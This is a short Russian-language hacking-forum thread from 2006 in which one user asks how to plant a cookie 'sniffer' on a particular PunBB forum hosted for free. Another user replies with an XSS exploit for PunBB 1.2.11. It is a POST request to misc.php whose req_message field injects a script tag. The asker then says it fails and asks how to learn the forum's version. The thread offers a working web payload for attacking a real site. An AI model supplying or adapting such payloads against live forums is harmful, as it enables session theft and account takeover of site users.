Форумы XSS в PunnBB

Discussion in 'Уязвимости CMS/форумов' started by nix, 10 May 2006.

  1. nix

    nix Banned

    Joined:
    7 May 2006
    Messages:
    33
    Likes Received:
    3
    Reputations:
    -5
    Есть один форум он стоит на беплатном хотинге форумов MyBB. Сам форум использует PunBB есть ли какийнить способы засунуть Снифера туда?
     
  2. _link

    _link New Member

    Joined:
    28 Feb 2006
    Messages:
    26
    Likes Received:
    1
    Reputations:
    0
    XSS в PunBB 1.2.11
    Exploit :-

    Send POST Request

    Code:
    GET :-
    /PunBB/misc.php?email=2
    POST :-
    form_sent=1&redirect_url=index.php&req_subject=test&req_message=test"><script>alert(1);</script>
    
     
  3. nix

    nix Banned

    Joined:
    7 May 2006
    Messages:
    33
    Likes Received:
    3
    Reputations:
    -5
    Там видать версии другие стоят непашет :(
    Тогда такой вопрос, как узнать версию PunBB Форума?
     
    #3 nix, 10 May 2006
    Last edited by a moderator: 11 May 2006